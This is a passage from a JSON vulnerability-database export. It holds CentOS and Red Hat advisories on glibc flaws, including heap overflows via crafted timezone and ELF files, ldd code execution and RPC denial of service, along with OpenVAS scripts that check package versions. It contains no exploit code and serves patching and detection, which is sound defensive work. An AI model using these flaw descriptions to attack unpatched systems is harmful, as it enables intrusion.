The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/030466.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0126.html", "edition": 3, "modified": "2012-02-14T03:06:54", "published": "2012-02-14T03:06:54", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/030466.html", "id": "CESA-2012:0126", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:25:07", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0125\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. 
(CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into the\nmtab (mounted file systems table) file via certain setuid mount helpers, if\nthe attacker were allowed to mount to an arbitrary directory under their\ncontrol. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on sufficiently\nlarge inputs, it could cause an application using fnmatch() to crash or,\npossibly, execute arbitrary code with the privileges of the application.\n(CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly escaped\noutput as required by the POSIX specification. If an attacker were able to\nset the locale environment variables in the environment of a script that\nperformed shell evaluation on the output of the locale command, and that\nscript were run with different privileges than the attacker's, it could\nexecute arbitrary code with the privileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. 
If an\nattacker supplied a long UTF-8 string to an application linked against\nglibc, it could cause the application to crash. (CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nThis update also fixes the following bug:\n\n* When using an nscd package that is a different version than the glibc\npackage, the nscd service could fail to start. This update makes the nscd\npackage require a specific glibc version to prevent this problem.\n(BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/030465.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-profile\nglibc-utils\nnptl-devel\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0125.html", "edition": 4, "modified": "2012-02-14T02:09:08", "published": "2012-02-14T02:09:08", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/030465.html", "id": "CESA-2012:0125", "title": "glibc, nptl, nscd security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:53", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0058\n\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. 
These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nThis update also fixes the following bugs:\n\n* glibc had incorrect information for numeric separators and groupings for\nspecific French, Spanish, and German locales. Therefore, applications\nutilizing glibc's locale support printed numbers with the wrong separators\nand groupings when those locales were in use. With this update, the\nseparator and grouping information has been fixed. (BZ#754116)\n\n* The RHBA-2011:1179 glibc update introduced a regression, causing glibc to\nincorrectly parse groups with more than 126 members, resulting in\napplications such as \"id\" failing to list all the groups a particular user\nwas a member of. With this update, group parsing has been fixed.\n(BZ#766484)\n\n* glibc incorrectly allocated too much memory due to a race condition\nwithin its own malloc routines. This could cause a multi-threaded\napplication to allocate more memory than was expected. With this update,\nthe race condition has been fixed, and malloc's behavior is now consistent\nwith the documentation regarding the MALLOC_ARENA_TEST and MALLOC_ARENA_MAX\nenvironment variables. 
(BZ#769594)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to resolve these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-January/030435.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0058.html", "edition": 3, "modified": "2012-01-30T20:26:30", "published": "2012-01-30T20:26:30", "href": "http://lists.centos.org/pipermail/centos-announce/2012-January/030435.html", "id": "CESA-2012:0058", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:55", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2011-1089", "CVE-2011-4609"], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. 
If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.\n", "modified": "2017-09-08T12:08:12", "published": "2012-02-13T05:00:00", "id": "RHSA-2012:0126", "href": "https://access.redhat.com/errata/RHSA-2012:0126", "type": "redhat", "title": "(RHSA-2012:0126) Moderate: glibc security update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:15", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0296", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1089", "CVE-2011-1095", "CVE-2011-1659", "CVE-2011-4609"], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. 
Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into the\nmtab (mounted file systems table) file via certain setuid mount helpers, if\nthe attacker were allowed to mount to an arbitrary directory under their\ncontrol. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). 
If the function was called on sufficiently\nlarge inputs, it could cause an application using fnmatch() to crash or,\npossibly, execute arbitrary code with the privileges of the application.\n(CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly escaped\noutput as required by the POSIX specification. If an attacker were able to\nset the locale environment variables in the environment of a script that\nperformed shell evaluation on the output of the locale command, and that\nscript were run with different privileges than the attacker's, it could\nexecute arbitrary code with the privileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If an\nattacker supplied a long UTF-8 string to an application linked against\nglibc, it could cause the application to crash. (CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nThis update also fixes the following bug:\n\n* When using an nscd package that is a different version than the glibc\npackage, the nscd service could fail to start. 
This update makes the nscd\npackage require a specific glibc version to prevent this problem.\n(BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these issues.\n", "modified": "2017-09-08T12:12:17", "published": "2012-02-13T05:00:00", "id": "RHSA-2012:0125", "href": "https://access.redhat.com/errata/RHSA-2012:0125", "type": "redhat", "title": "(RHSA-2012:0125) Moderate: glibc security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:42", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5064", "CVE-2011-1089"], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. 
If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nRed Hat would like to thank Dan Rosenberg for reporting the CVE-2011-1089\nissue.\n\nThis update also fixes several bugs and adds various enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document, linked to in the References\nsection.\n\nUsers are advised to upgrade to these updated glibc packages, which contain\nbackported patches to resolve these issues and add these enhancements.\n", "modified": "2018-06-06T20:24:09", "published": "2011-12-06T05:00:00", "id": "RHSA-2011:1526", "href": "https://access.redhat.com/errata/RHSA-2011:1526", "type": "redhat", "title": "(RHSA-2011:1526) Low: glibc security, bug fix, and enhancement update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:51", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2011-4609"], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. 
(CVE-2011-4609)\n\nThis update also fixes the following bugs:\n\n* glibc had incorrect information for numeric separators and groupings for\nspecific French, Spanish, and German locales. Therefore, applications\nutilizing glibc's locale support printed numbers with the wrong separators\nand groupings when those locales were in use. With this update, the\nseparator and grouping information has been fixed. (BZ#754116)\n\n* The RHBA-2011:1179 glibc update introduced a regression, causing glibc to\nincorrectly parse groups with more than 126 members, resulting in\napplications such as \"id\" failing to list all the groups a particular user\nwas a member of. With this update, group parsing has been fixed.\n(BZ#766484)\n\n* glibc incorrectly allocated too much memory due to a race condition\nwithin its own malloc routines. This could cause a multi-threaded\napplication to allocate more memory than was expected. With this update,\nthe race condition has been fixed, and malloc's behavior is now consistent\nwith the documentation regarding the MALLOC_ARENA_TEST and MALLOC_ARENA_MAX\nenvironment variables. (BZ#769594)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to resolve these issues.\n", "modified": "2018-06-06T20:24:36", "published": "2012-01-24T05:00:00", "id": "RHSA-2012:0058", "href": "https://access.redhat.com/errata/RHSA-2012:0058", "type": "redhat", "title": "(RHSA-2012:0058) Moderate: glibc security and bug fix update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:22", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2011-4108", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4609", "CVE-2011-4619", "CVE-2012-0029", "CVE-2012-0050", "CVE-2012-0056"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. 
The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA heap overflow flaw was found in the way QEMU-KVM emulated the e1000\nnetwork interface card. A privileged guest user in a virtual machine whose\nnetwork interface is configured to use the e1000 emulated driver could use\nthis flaw to crash the host or, possibly, escalate their privileges on the\nhost. (CVE-2012-0029)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. Incorrect initialization of SSL record padding bytes could\ncause an SSL client or server to send a limited amount of possibly\nsensitive data to its SSL peer via the encrypted connection.\n(CVE-2011-4576)\n\nA denial of service flaw was found in the RFC 3779 implementation in\nOpenSSL. A remote attacker could use this flaw to make an application using\nOpenSSL exit unexpectedly by providing a specially-crafted X.509\ncertificate that has malformed RFC 3779 extension data. (CVE-2011-4577)\n\nIt was discovered that OpenSSL did not limit the number of TLS/SSL\nhandshake restarts required to support Server Gated Cryptography. A remote\nattacker could use this flaw to make a TLS/SSL server using OpenSSL consume\nan excessive amount of CPU by continuously restarting the handshake.\n(CVE-2011-4619)\n\nRed Hat would like to thank Nicolae Mogoreanu for reporting CVE-2012-0029.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. 
The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2009-5029 and CVE-2011-4609 (glibc issues)\n\nCVE-2012-0056 (kernel issue)\n\nCVE-2011-4108 and CVE-2012-0050 (openssl issues)\n\nThis update also fixes the following bugs:\n\n* Previously, it was possible to begin a Hypervisor installation without\nany valid disks to install to.\n\nNow, if no valid disks are found for Hypervisor installation, a message is\ndisplayed informing the user that there are no valid disks for\ninstallation. (BZ#781471)\n\n* Previously, the user interface for the Hypervisor did not indicate\nwhether the system was registered with Red Hat Network (RHN) Classic or RHN\nSatellite. As a result, customers could not easily determine the\nregistration status of their Hypervisor installations.\n\nThe TUI has been updated to display the registration status of the\nHypervisor. (BZ#788223)\n\n* Previously, autoinstall would fail if the firstboot or reinstall options\nwere passed but local_boot or upgrade were not passed. Now, neither the\nlocal_boot nor upgrade parameters are required for autoinstall. 
(BZ#788225)\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "modified": "2018-06-07T08:59:39", "published": "2012-02-15T05:00:00", "id": "RHSA-2012:0109", "href": "https://access.redhat.com/errata/RHSA-2012:0109", "type": "redhat", "title": "(RHSA-2012:0109) Important: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:38:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-02-21T00:00:00", "id": "OPENVAS:1361412562310870556", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870556", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0126-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0126-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00027.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870556\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:56:49 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2012:0126-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0126-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. 
Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n glibc, could use this flaw to make that service use an excessive amount of\n CPU time. (CVE-2011-4609)\n\n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. 
The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n\n Users should upgrade to these updated packages, which resolve these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", 
"CVE-2011-1089", "CVE-2009-5064"], "description": "Oracle Linux Local Security Checks ELSA-2012-0126", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123990", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123990", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0126", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0126.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123990\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:11:17 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0126\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0126 - glibc security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0126\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0126.html\");\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\", \"CVE-2010-0830\", \"CVE-2009-5029\", \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = 
